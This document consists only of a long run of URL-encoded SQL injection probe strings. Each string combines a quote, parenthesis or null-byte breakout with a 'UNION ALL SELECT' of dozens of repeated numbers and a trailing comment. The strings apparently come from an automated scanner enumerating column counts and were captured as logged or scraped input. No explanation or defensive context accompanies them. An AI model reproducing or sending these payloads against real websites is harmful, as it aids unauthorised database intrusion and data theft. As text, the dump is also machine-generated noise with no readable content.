-1194%25%27%29%29%29%20UNION%20ALL%20SELECT%207661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661--%20 -8921%25%27%20UNION%20ALL%20SELECT%207299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299--%20 -4395%25%27%20UNION%20ALL%20SELECT%207696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696%2C7696--%20 -5733%25%27%20UNION%20ALL%20SELECT%203742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742%2C3742--%20 -1751%25%27%20UNION%20ALL%20SELECT%203647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647%2C3647--%20 -9089%25%27%20UNION%20ALL%20SELECT%203792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792%2C3792--%20 -2025%25%27%20UNION%20ALL%20SELECT%209649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649--%20 -9478%25%27%20UNION%20ALL%20SELECT%208552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552--%20 -3916%25%27%20UNION%20ALL%20SELECT%204894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894%2C4894--%20 -2741%25%27%20UNION%20ALL%20SELECT%202355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355--%20 -5803%25%27%20UNION%20ALL%20SELECT%209856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856%2C9856--%20 -3778%00%27%29%20UNION%20ALL%20SELECT%204201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201--%20 -2602%00%27%29%20UNION%20ALL%20SELECT%203553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553--%20 -8702%00%27%29%20UNION%20ALL%20SELECT%208643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643%2C8643--%20 -2670%00%27%29%20UNION%20ALL%20SELECT%206505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505--%20 -4879%00%27%29%20UNION%20ALL%20SELECT%205713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713%2C5713--%20 -1178%00%27%29%20UNION%20ALL%20SELECT%205382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382%2C5382--%20 -6120%00%27%29%20UNION%20ALL%20SELECT%205971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971--%20 -2303%00%27%29%20UNION%20ALL%20SELECT%209481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481--%20 -3674%00%27%29%20UNION%20ALL%20SELECT%209597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597--%20 -6888%00%27%29%20UNION%20ALL%20SELECT%202132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132--%20 -5429%00%27%20UNION%20ALL%20SELECT%205778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778%2C5778--%20 -7267%00%27%20UNION%20ALL%20SELECT%205535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535%2C5535--%20 -7966%00%27%20UNION%20ALL%20SELECT%204172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172--%20 -7387%00%27%20UNION%20ALL%20SELECT%202783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783%2C2783--%20 -3997%00%27%20UNION%20ALL%20SELECT%206834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834--%20 -2984%00%27%20UNION%20ALL%20SELECT%203137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137--%20 -8323%00%27%20UNION%20ALL%20SELECT%203978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978--%20 -7750%00%27%20UNION%20ALL%20SELECT%206738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738--%20 -7029%00%27%20UNION%20ALL%20SELECT%201499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499%2C1499--%20 -9521%00%27%20UNION%20ALL%20SELECT%206677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677%2C6677--%20 -8449%27%29%20WHERE%201907%3D1907%20UNION%20ALL%20SELECT%201907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907%2C1907--%20 -8153%27%29%20WHERE%201661%3D1661%20UNION%20ALL%20SELECT%201661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661%2C1661--%20 -2552%27%29%20WHERE%203771%3D3771%20UNION%20ALL%20SELECT%203771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771--%20 -6646%27%29%20WHERE%206508%3D6508%20UNION%20ALL%20SELECT%206508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508%2C6508--%20 -3489%27%29%20WHERE%206958%3D6958%20UNION%20ALL%20SELECT%206958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958%2C6958--%20 -2001%27%29%20WHERE%205158%3D5158%20UNION%20ALL%20SELECT%205158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158%2C5158--%20 -3814%27%29%20WHERE%209096%3D9096%20UNION%20ALL%20SELECT%209096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096--%20 -2305%27%29%20WHERE%204841%3D4841%20UNION%20ALL%20SELECT%204841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841%2C4841--%20 -5360%27%29%20WHERE%202261%3D2261%20UNION%20ALL%20SELECT%202261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261--%20 -7479%27%29%20WHERE%206378%3D6378%20UNION%20ALL%20SELECT%206378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378--%20 -1702%22%29%20WHERE%207985%3D7985%20UNION%20ALL%20SELECT%207985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985%2C7985--%20 -7843%22%29%20WHERE%201952%3D1952%20UNION%20ALL%20SELECT%201952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952%2C1952--%20 -4175%22%29%20WHERE%203675%3D3675%20UNION%20ALL%20SELECT%203675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675%2C3675--%20 -7737%22%29%20WHERE%207907%3D7907%20UNION%20ALL%20SELECT%207907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907--%20 -2195%22%29%20WHERE%206089%3D6089%20UNION%20ALL%20SELECT%206089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089%2C6089--%20 -2775%22%29%20WHERE%203610%3D3610%20UNION%20ALL%20SELECT%203610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610%2C3610--%20 -5063%22%29%20WHERE%206163%3D6163%20UNION%20ALL%20SELECT%206163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163%2C6163--%20 -3842%22%29%20WHERE%201938%3D1938%20UNION%20ALL%20SELECT%201938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938%2C1938--%20 -2075%22%29%20WHERE%201746%3D1746%20UNION%20ALL%20SELECT%201746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746--%20 -8069%22%29%20WHERE%208289%3D8289%20UNION%20ALL%20SELECT%208289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289--%20 -4998%27%20WHERE%208829%3D8829%20UNION%20ALL%20SELECT%208829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829--%20 -7755%27%20WHERE%205303%3D5303%20UNION%20ALL%20SELECT%205303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303--%20 -3136%27%20WHERE%204958%3D4958%20UNION%20ALL%20SELECT%204958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958--%20 -4095%27%20WHERE%209567%3D9567%20UNION%20ALL%20SELECT%209567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567--%20 -1646%27%20WHERE%208378%3D8378%20UNION%20ALL%20SELECT%208378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378%2C8378--%20 -9741%27%20WHERE%205513%3D5513%20UNION%20ALL%20SELECT%205513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513--%20 